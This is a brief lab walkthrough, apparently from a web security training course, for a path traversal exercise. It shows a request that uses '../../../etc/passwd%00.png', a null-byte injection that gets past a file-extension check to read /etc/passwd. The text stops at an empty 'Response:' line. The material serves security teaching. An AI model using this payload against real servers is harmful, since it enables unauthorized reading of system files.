Lab Description

This lab contains a path traversal vulnerability in the display of product images. The application validates that the supplied filename ends with the expected file extension.

Objective: Retrieve the contents of the /etc/passwd file.



Step 1: Capture the Image Request

  1. In Burp’s browser, access the lab
  2. Browse to a product page
  3. Find an image request in Burp Proxy

Example request:

GET /image?filename=73.jpg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net


Step 2: Send to Repeater(Optional)

Right-click the request  Send to Repeater


Step 3: Modify the Filename

Original:

GET /image?filename=product1.jpg HTTP/1.1

Modified (with null byte):

GET /image?filename=../../../etc/passwd%00.png HTTP/1.1

Step 4: Send the Request

  1. Click Send in Repeater
  2. Observe the response

Response:
